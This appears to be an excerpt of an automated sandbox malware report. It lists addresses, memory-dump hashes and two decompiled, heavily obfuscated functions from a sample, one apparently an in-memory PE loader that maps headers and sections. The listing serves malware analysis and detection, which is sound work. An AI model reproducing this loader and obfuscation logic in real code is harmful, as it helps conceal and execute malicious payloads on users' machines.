                                                                                                                                                                                                                    0x00a77875
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a778ff
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a778ff
                                                                                                                                                                                                                    0x00a77890
                                                                                                                                                                                                                    0x00a77895
                                                                                                                                                                                                                    0x00a77899
                                                                                                                                                                                                                    0x00a7789a
                                                                                                                                                                                                                    0x00a7789c
                                                                                                                                                                                                                    0x00a778cf
                                                                                                                                                                                                                    0x00a778d4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7789e
                                                                                                                                                                                                                    0x00a778ad
                                                                                                                                                                                                                    0x00a778b2
                                                                                                                                                                                                                    0x00a778ba
                                                                                                                                                                                                                    0x00a778bd
                                                                                                                                                                                                                    0x00a778c2
                                                                                                                                                                                                                    0x00a778c5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a778c5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a778d9
                                                                                                                                                                                                                    0x00a778d9
                                                                                                                                                                                                                    0x00a778d9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a777f5

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: CM+$UhW$`
                                                                                                                                                                                                                    • API String ID: 0-1065594204
                                                                                                                                                                                                                    • Opcode ID: 71a1d8d23c0ec08a3bb801b5c14caeac775aa9e056ece33ebf3bb72d0896bfe1
                                                                                                                                                                                                                    • Instruction ID: 042167730d7417cf1f34fc3bf028ca2f7a5eaae327e9bb99110371ccacd83434
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a1d8d23c0ec08a3bb801b5c14caeac775aa9e056ece33ebf3bb72d0896bfe1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 427125B2909341AFD358CF25D94A40FBBF1BB89758F409A1DF499A6220D3B5D909CF83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                    			E00A7B2B8(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a8) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                    				void* _t164;
                                                                                                                                                                                                                    				void* _t174;
                                                                                                                                                                                                                    				void* _t176;
                                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                                    				signed int _t179;
                                                                                                                                                                                                                    				signed int _t180;
                                                                                                                                                                                                                    				signed int _t181;
                                                                                                                                                                                                                    				void* _t202;
                                                                                                                                                                                                                    				void* _t207;
                                                                                                                                                                                                                    				signed int* _t211;
                                                                                                                                                                                                                    				signed int* _t212;
                                                                                                                                                                                                                    				signed int* _t213;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t209 = _a8;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t152);
                                                                                                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                                                                                                    				_v8 = 0xdeec14;
                                                                                                                                                                                                                    				_v36 = 0xb181c5;
                                                                                                                                                                                                                    				_v36 = _v36 >> 4;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x000b081c;
                                                                                                                                                                                                                    				_v40 = 0x6d1050;
                                                                                                                                                                                                                    				_t178 = 3;
                                                                                                                                                                                                                    				_v40 = _v40 / _t178;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x00247ac5;
                                                                                                                                                                                                                    				_v68 = 0x22902;
                                                                                                                                                                                                                    				_v68 = _v68 + 0x49e3;
                                                                                                                                                                                                                    				_t179 = 0x27;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x4a;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x4003f7a6;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x40b6c1d4;
                                                                                                                                                                                                                    				_v72 = 0xa816a5;
                                                                                                                                                                                                                    				_v72 = _v72 | 0x87aca61c;
                                                                                                                                                                                                                    				_v72 = _v72 << 0xc;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0xc06a93a5;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0b0d8c31;
                                                                                                                                                                                                                    				_v64 = 0xe33e0f;
                                                                                                                                                                                                                    				_t180 = 0x37;
                                                                                                                                                                                                                    				_v64 = _v64 / _t179;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xfffff833;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x000e472a;
                                                                                                                                                                                                                    				_v76 = 0xc7e6d6;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xd097;
                                                                                                                                                                                                                    				_v76 = _v76 << 3;
                                                                                                                                                                                                                    				_v76 = _v76 * 0x3f;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x8b291265;
                                                                                                                                                                                                                    				_v32 = 0x535d58;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xa1fe;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00572e62;
                                                                                                                                                                                                                    				_v44 = 0x921f08;
                                                                                                                                                                                                                    				_v44 = _v44 | 0xc3f2ef61;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xc3f6369a;
                                                                                                                                                                                                                    				_v48 = 0x3b2d63;
                                                                                                                                                                                                                    				_t68 =  &_v48; // 0x3b2d63
                                                                                                                                                                                                                    				_t181 = 0x5f;
                                                                                                                                                                                                                    				_v48 =  *_t68 / _t180;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x00057eb9;
                                                                                                                                                                                                                    				_v24 = 0xc4c6ba;
                                                                                                                                                                                                                    				_v24 = _v24 >> 0xb;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00088df5;
                                                                                                                                                                                                                    				_v56 = 0xf3f46;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xbe3b644a;
                                                                                                                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x005864ab;
                                                                                                                                                                                                                    				_v60 = 0xaf82c3;
                                                                                                                                                                                                                    				_v60 = _v60 | 0xd2851c45;
                                                                                                                                                                                                                    				_v60 = _v60 >> 0xf;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x000e9c70;
                                                                                                                                                                                                                    				_v28 = 0x1b4a3e;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff8d2e;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00178a18;
                                                                                                                                                                                                                    				_v52 = 0x7a0f91;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x9eec6da1;
                                                                                                                                                                                                                    				_v52 = _v52 / _t181;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x01a5591d;
                                                                                                                                                                                                                    				_v12 = 0x3346b3;
                                                                                                                                                                                                                    				_v12 = _v12 | 0x6d40a51d;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x6d75c03a;
                                                                                                                                                                                                                    				_v16 = 0xcdd95b;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xf304;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00c1cbc0;
                                                                                                                                                                                                                    				_v20 = 0xfaf0b8;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0xa;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00026082;
                                                                                                                                                                                                                    				_t196 = _v64;
                                                                                                                                                                                                                    				_t164 = E00A62CC2(_v72, _v64, _a8, _v76);
                                                                                                                                                                                                                    				_t174 = _t164;
                                                                                                                                                                                                                    				_t211 =  &(( &_v76)[6]);
                                                                                                                                                                                                                    				if(_t174 != 0) {
                                                                                                                                                                                                                    					_t202 = E00A73EBE(_v32, _t196, _v40 | _v36, _v44, _v68, _v48,  *((intOrPtr*)(_t174 + 0x50)));
                                                                                                                                                                                                                    					_t212 =  &(_t211[5]);
                                                                                                                                                                                                                    					if(_t202 == 0) {
                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                    						return _t202;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A7056B( *_t209, _v24, _t202,  *((intOrPtr*)(_t174 + 0x54)), _v56, _v60, _v28);
                                                                                                                                                                                                                    					_t213 =  &(_t212[5]);
                                                                                                                                                                                                                    					_t207 = ( *(_t174 + 0x14) & 0x0000ffff) + 0x18 + _t174;
                                                                                                                                                                                                                    					_t176 = ( *(_t174 + 6) & 0x0000ffff) * 0x28 + _t207;
                                                                                                                                                                                                                    					while(_t207 < _t176) {
                                                                                                                                                                                                                    						_t172 =  <  ?  *((void*)(_t207 + 8)) :  *((intOrPtr*)(_t207 + 0x10));
                                                                                                                                                                                                                    						E00A7056B( *_t209 +  *((intOrPtr*)(_t207 + 0x14)), _v52,  *((intOrPtr*)(_t207 + 0xc)) + _t202,  <  ?  *((void*)(_t207 + 8)) :  *((intOrPtr*)(_t207 + 0x10)), _v12, _v16, _v20);
                                                                                                                                                                                                                    						_t213 =  &(_t213[5]);
                                                                                                                                                                                                                    						_t207 = _t207 + 0x28;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t164;
                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                    0x00a7b2bd
                                                                                                                                                                                                                    0x00a7b2c1
                                                                                                                                                                                                                    0x00a7b2c2
                                                                                                                                                                                                                    0x00a7b2c4
                                                                                                                                                                                                                    0x00a7b2c5
                                                                                                                                                                                                                    0x00a7b2c6
                                                                                                                                                                                                                    0x00a7b2cb
                                                                                                                                                                                                                    0x00a7b2d2
                                                                                                                                                                                                                    0x00a7b2da
                                                                                                                                                                                                                    0x00a7b2e2
                                                                                                                                                                                                                    0x00a7b2e7
                                                                                                                                                                                                                    0x00a7b2ef
                                                                                                                                                                                                                    0x00a7b2fd
                                                                                                                                                                                                                    0x00a7b302
                                                                                                                                                                                                                    0x00a7b308
                                                                                                                                                                                                                    0x00a7b310
                                                                                                                                                                                                                    0x00a7b318
                                                                                                                                                                                                                    0x00a7b325
                                                                                                                                                                                                                    0x00a7b328
                                                                                                                                                                                                                    0x00a7b32c
                                                                                                                                                                                                                    0x00a7b334
                                                                                                                                                                                                                    0x00a7b33c
                                                                                                                                                                                                                    0x00a7b344
                                                                                                                                                                                                                    0x00a7b34c
                                                                                                                                                                                                                    0x00a7b351
                                                                                                                                                                                                                    0x00a7b359
                                                                                                                                                                                                                    0x00a7b361
                                                                                                                                                                                                                    0x00a7b36f
                                                                                                                                                                                                                    0x00a7b370
                                                                                                                                                                                                                    0x00a7b376
                                                                                                                                                                                                                    0x00a7b37e
                                                                                                                                                                                                                    0x00a7b386
                                                                                                                                                                                                                    0x00a7b38e
                                                                                                                                                                                                                    0x00a7b396
                                                                                                                                                                                                                    0x00a7b3a2
                                                                                                                                                                                                                    0x00a7b3a6
                                                                                                                                                                                                                    0x00a7b3ae
                                                                                                                                                                                                                    0x00a7b3b6
                                                                                                                                                                                                                    0x00a7b3be
                                                                                                                                                                                                                    0x00a7b3c6
                                                                                                                                                                                                                    0x00a7b3ce
                                                                                                                                                                                                                    0x00a7b3d6
                                                                                                                                                                                                                    0x00a7b3de
                                                                                                                                                                                                                    0x00a7b3e6
                                                                                                                                                                                                                    0x00a7b3ec
                                                                                                                                                                                                                    0x00a7b3ed
                                                                                                                                                                                                                    0x00a7b3f1
                                                                                                                                                                                                                    0x00a7b3f9
                                                                                                                                                                                                                    0x00a7b401
                                                                                                                                                                                                                    0x00a7b406
                                                                                                                                                                                                                    0x00a7b40e
                                                                                                                                                                                                                    0x00a7b416
                                                                                                                                                                                                                    0x00a7b41e
                                                                                                                                                                                                                    0x00a7b423
                                                                                                                                                                                                                    0x00a7b42b
                                                                                                                                                                                                                    0x00a7b433
                                                                                                                                                                                                                    0x00a7b43b
                                                                                                                                                                                                                    0x00a7b440
                                                                                                                                                                                                                    0x00a7b448
                                                                                                                                                                                                                    0x00a7b450
                                                                                                                                                                                                                    0x00a7b458
                                                                                                                                                                                                                    0x00a7b460
                                                                                                                                                                                                                    0x00a7b468
                                                                                                                                                                                                                    0x00a7b478
                                                                                                                                                                                                                    0x00a7b47c
                                                                                                                                                                                                                    0x00a7b484
                                                                                                                                                                                                                    0x00a7b48c
                                                                                                                                                                                                                    0x00a7b494
                                                                                                                                                                                                                    0x00a7b49c
                                                                                                                                                                                                                    0x00a7b4a4
                                                                                                                                                                                                                    0x00a7b4ac
                                                                                                                                                                                                                    0x00a7b4b4
                                                                                                                                                                                                                    0x00a7b4bc
                                                                                                                                                                                                                    0x00a7b4c1
                                                                                                                                                                                                                    0x00a7b4cd
                                                                                                                                                                                                                    0x00a7b4d6
                                                                                                                                                                                                                    0x00a7b4db
                                                                                                                                                                                                                    0x00a7b4dd
                                                                                                                                                                                                                    0x00a7b4e2
                                                                                                                                                                                                                    0x00a7b50a
                                                                                                                                                                                                                    0x00a7b50c
                                                                                                                                                                                                                    0x00a7b511
                                                                                                                                                                                                                    0x00a7b57e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7b580
                                                                                                                                                                                                                    0x00a7b52b
                                                                                                                                                                                                                    0x00a7b534
                                                                                                                                                                                                                    0x00a7b53e
                                                                                                                                                                                                                    0x00a7b543
                                                                                                                                                                                                                    0x00a7b579
                                                                                                                                                                                                                    0x00a7b564
                                                                                                                                                                                                                    0x00a7b56e
                                                                                                                                                                                                                    0x00a7b573
                                                                                                                                                                                                                    0x00a7b576
                                                                                                                                                                                                                    0x00a7b576
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7b57d
                                                                                                                                                                                                                    0x00a7b586

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: b.W$c-;$I
                                                                                                                                                                                                                    • API String ID: 0-1527029403
                                                                                                                                                                                                                    • Opcode ID: 952183efe55164b193dd361325dff9468240e7e37c3a2b4b6139d934f4fef67b
                                                                                                                                                                                                                    • Instruction ID: 5a7e393ddb29061c85a0873c3ef1e4ceb3d9501273087181ec29e9e9c32ca57c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 952183efe55164b193dd361325dff9468240e7e37c3a2b4b6139d934f4fef67b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C7132B25083409FC754CF66C88A91BBBF1BFC8758F008A1DF58A96221D7B5CA49CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                    			E00A7C400(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				unsigned int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				void* _t143;
                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                    				signed int _t156;
                                                                                                                                                                                                                    				intOrPtr* _t159;
                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                                    				signed int _t179;
                                                                                                                                                                                                                    				signed int _t180;
                                                                                                                                                                                                                    				signed int* _t184;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t159 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t143);
                                                                                                                                                                                                                    				_v28 = 0xa438d4;
                                                                                                                                                                                                                    				_t184 =  &(( &_v60)[5]);
                                                                                                                                                                                                                    				_v28 = _v28 | 0x3c30a769;
                                                                                                                                                                                                                    				_v28 = _v28 << 2;
                                                                                                                                                                                                                    				_t177 = 0;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xf2d2fff6;
                                                                                                                                                                                                                    				_t161 = 0x161e36a;
                                                                                                                                                                                                                    				_v36 = 0xff1860;
                                                                                                                                                                                                                    				_v36 = _v36 >> 0xe;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x98c7db80;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x98c7d86c;
                                                                                                                                                                                                                    				_v16 = 0xbc3643;
                                                                                                                                                                                                                    				_v16 = _v16 | 0x368c0d5d;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x76bc3f5f;
                                                                                                                                                                                                                    				_v24 = 0x3fa522;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x83deb6af;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffff1ba6;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x83e330a2;
                                                                                                                                                                                                                    				_v56 = 0x38f463;
                                                                                                                                                                                                                    				_v56 = _v56 << 0xb;
                                                                                                                                                                                                                    				_v56 = _v56 << 0xd;
                                                                                                                                                                                                                    				_v56 = _v56 + 0x4432;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x630f0cb2;
                                                                                                                                                                                                                    				_v32 = 0xe8eb4b;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x95d9;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x63ed;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00e44b41;
                                                                                                                                                                                                                    				_v12 = 0xb2ecbd;
                                                                                                                                                                                                                    				_v12 = _v12 << 5;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x1650952a;
                                                                                                                                                                                                                    				_v60 = 0x80206f;
                                                                                                                                                                                                                    				_v60 = _v60 | 0x2b5ee020;
                                                                                                                                                                                                                    				_t54 =  &_v60; // 0x2b5ee020
                                                                                                                                                                                                                    				_t178 = 0xe;
                                                                                                                                                                                                                    				_v60 =  *_t54 * 0x1d;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x1c4d00e3;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xe4768acf;
                                                                                                                                                                                                                    				_v8 = 0x4b8cf0;
                                                                                                                                                                                                                    				_v8 = _v8 / _t178;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x000ca825;
                                                                                                                                                                                                                    				_v44 = 0x341379;
                                                                                                                                                                                                                    				_v44 = _v44 >> 2;
                                                                                                                                                                                                                    				_v44 = _v44 >> 0xc;
                                                                                                                                                                                                                    				_v44 = _v44 + 0x59d5;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000e5c81;
                                                                                                                                                                                                                    				_v48 = 0xa4474f;
                                                                                                                                                                                                                    				_v48 = _v48 >> 6;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x8c1a;
                                                                                                                                                                                                                    				_v48 = _v48 + 0xd380;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000cab15;
                                                                                                                                                                                                                    				_v52 = 0x4160af;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xdb8e;
                                                                                                                                                                                                                    				_v52 = _v52 << 4;
                                                                                                                                                                                                                    				_v52 = _v52 >> 6;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x00113c30;
                                                                                                                                                                                                                    				_v40 = 0x50835e;
                                                                                                                                                                                                                    				_t179 = 0x1a;
                                                                                                                                                                                                                    				_v40 = _v40 / _t179;
                                                                                                                                                                                                                    				_v40 = _v40 * 0xa;
                                                                                                                                                                                                                    				_v40 = _v40 >> 7;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x0001266f;
                                                                                                                                                                                                                    				_v20 = 0x317afb;
                                                                                                                                                                                                                    				_v20 = _v20 | 0xc17224b9;
                                                                                                                                                                                                                    				_t180 = 0x1d;
                                                                                                                                                                                                                    				_v20 = _v20 / _t180;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x06aaefdb;
                                                                                                                                                                                                                    				_v4 = 0x37e888;
                                                                                                                                                                                                                    				_v4 = _v4 * 0x7f;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x1bbfc4a1;
                                                                                                                                                                                                                    				_t181 = _v4;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t161 != 0x161e36a) {
                                                                                                                                                                                                                    						if(_t161 == 0x77fc44d) {
                                                                                                                                                                                                                    							_t155 = E00A62659(_v8, _v44, _v48, _t161, _v52,  *_t159, _t181, _t159 + 4,  *((intOrPtr*)(_t159 + 4)));
                                                                                                                                                                                                                    							_t184 =  &(_t184[7]);
                                                                                                                                                                                                                    							_t177 = _t155;
                                                                                                                                                                                                                    							_t161 = 0xda68fba;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t161 == 0x8baac94) {
                                                                                                                                                                                                                    								_t156 = E00A7A3E9(_v24, _v28, _t161, _a4, _t161, _v56, _v32, _v36, _v12, _v60, 0, _v16);
                                                                                                                                                                                                                    								_t181 = _t156;
                                                                                                                                                                                                                    								_t184 =  &(_t184[0xa]);
                                                                                                                                                                                                                    								if(_t156 != 0xffffffff) {
                                                                                                                                                                                                                    									_t161 = 0x77fc44d;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t161 != 0xda68fba) {
                                                                                                                                                                                                                    									goto L11;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t128 =  &_v40; // 0xe44b41
                                                                                                                                                                                                                    									E00A6E2BD(_t181,  *_t128, _v20, _v4);
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                    						return _t177;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t161 = 0x8baac94;
                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                    				} while (_t161 != 0xb48172);
                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                    0x00a7c407
                                                                                                                                                                                                                    0x00a7c40b
                                                                                                                                                                                                                    0x00a7c40d
                                                                                                                                                                                                                    0x00a7c411
                                                                                                                                                                                                                    0x00a7c415
                                                                                                                                                                                                                    0x00a7c416
                                                                                                                                                                                                                    0x00a7c417
                                                                                                                                                                                                                    0x00a7c41c
                                                                                                                                                                                                                    0x00a7c424
                                                                                                                                                                                                                    0x00a7c427
                                                                                                                                                                                                                    0x00a7c431
                                                                                                                                                                                                                    0x00a7c436
                                                                                                                                                                                                                    0x00a7c438
                                                                                                                                                                                                                    0x00a7c440
                                                                                                                                                                                                                    0x00a7c445
                                                                                                                                                                                                                    0x00a7c44d
                                                                                                                                                                                                                    0x00a7c452
                                                                                                                                                                                                                    0x00a7c45a
                                                                                                                                                                                                                    0x00a7c462
                                                                                                                                                                                                                    0x00a7c46a
                                                                                                                                                                                                                    0x00a7c472
                                                                                                                                                                                                                    0x00a7c47a
                                                                                                                                                                                                                    0x00a7c482
                                                                                                                                                                                                                    0x00a7c48a
                                                                                                                                                                                                                    0x00a7c492
                                                                                                                                                                                                                    0x00a7c49a
                                                                                                                                                                                                                    0x00a7c4a2
                                                                                                                                                                                                                    0x00a7c4a7
                                                                                                                                                                                                                    0x00a7c4ac
                                                                                                                                                                                                                    0x00a7c4b4
                                                                                                                                                                                                                    0x00a7c4bc
                                                                                                                                                                                                                    0x00a7c4c4
                                                                                                                                                                                                                    0x00a7c4cc
                                                                                                                                                                                                                    0x00a7c4d4
                                                                                                                                                                                                                    0x00a7c4dc
                                                                                                                                                                                                                    0x00a7c4e4
                                                                                                                                                                                                                    0x00a7c4e9
                                                                                                                                                                                                                    0x00a7c4f1
                                                                                                                                                                                                                    0x00a7c4f9
                                                                                                                                                                                                                    0x00a7c501
                                                                                                                                                                                                                    0x00a7c508
                                                                                                                                                                                                                    0x00a7c50b
                                                                                                                                                                                                                    0x00a7c50f
                                                                                                                                                                                                                    0x00a7c517
                                                                                                                                                                                                                    0x00a7c51f
                                                                                                                                                                                                                    0x00a7c52f
                                                                                                                                                                                                                    0x00a7c533
                                                                                                                                                                                                                    0x00a7c53b
                                                                                                                                                                                                                    0x00a7c543
                                                                                                                                                                                                                    0x00a7c548
                                                                                                                                                                                                                    0x00a7c54d
                                                                                                                                                                                                                    0x00a7c555
                                                                                                                                                                                                                    0x00a7c55d
                                                                                                                                                                                                                    0x00a7c565
                                                                                                                                                                                                                    0x00a7c56a
                                                                                                                                                                                                                    0x00a7c572
                                                                                                                                                                                                                    0x00a7c57a
                                                                                                                                                                                                                    0x00a7c582
                                                                                                                                                                                                                    0x00a7c58a
                                                                                                                                                                                                                    0x00a7c592
                                                                                                                                                                                                                    0x00a7c597
                                                                                                                                                                                                                    0x00a7c59c
                                                                                                                                                                                                                    0x00a7c5a4
                                                                                                                                                                                                                    0x00a7c5b0
                                                                                                                                                                                                                    0x00a7c5b3
                                                                                                                                                                                                                    0x00a7c5bc
                                                                                                                                                                                                                    0x00a7c5c0
                                                                                                                                                                                                                    0x00a7c5c5
                                                                                                                                                                                                                    0x00a7c5cd
                                                                                                                                                                                                                    0x00a7c5d7
                                                                                                                                                                                                                    0x00a7c5ea
                                                                                                                                                                                                                    0x00a7c5ed
                                                                                                                                                                                                                    0x00a7c5f1
                                                                                                                                                                                                                    0x00a7c5f9
                                                                                                                                                                                                                    0x00a7c606
                                                                                                                                                                                                                    0x00a7c60a
                                                                                                                                                                                                                    0x00a7c612
                                                                                                                                                                                                                    0x00a7c616
                                                                                                                                                                                                                    0x00a7c616
                                                                                                                                                                                                                    0x00a7c624
                                                                                                                                                                                                                    0x00a7c6ae
                                                                                                                                                                                                                    0x00a7c6b3
                                                                                                                                                                                                                    0x00a7c6b6
                                                                                                                                                                                                                    0x00a7c6b8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c626
                                                                                                                                                                                                                    0x00a7c62c
                                                                                                                                                                                                                    0x00a7c681
                                                                                                                                                                                                                    0x00a7c686
                                                                                                                                                                                                                    0x00a7c688
                                                                                                                                                                                                                    0x00a7c68e
                                                                                                                                                                                                                    0x00a7c690
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c690
                                                                                                                                                                                                                    0x00a7c62e
                                                                                                                                                                                                                    0x00a7c634
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c63a
                                                                                                                                                                                                                    0x00a7c644
                                                                                                                                                                                                                    0x00a7c648
                                                                                                                                                                                                                    0x00a7c64e
                                                                                                                                                                                                                    0x00a7c634
                                                                                                                                                                                                                    0x00a7c62c
                                                                                                                                                                                                                    0x00a7c64f
                                                                                                                                                                                                                    0x00a7c658
                                                                                                                                                                                                                    0x00a7c658
                                                                                                                                                                                                                    0x00a7c6c2
                                                                                                                                                                                                                    0x00a7c6c7
                                                                                                                                                                                                                    0x00a7c6c7
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ^+$2D$AK
                                                                                                                                                                                                                    • API String ID: 0-2554492861
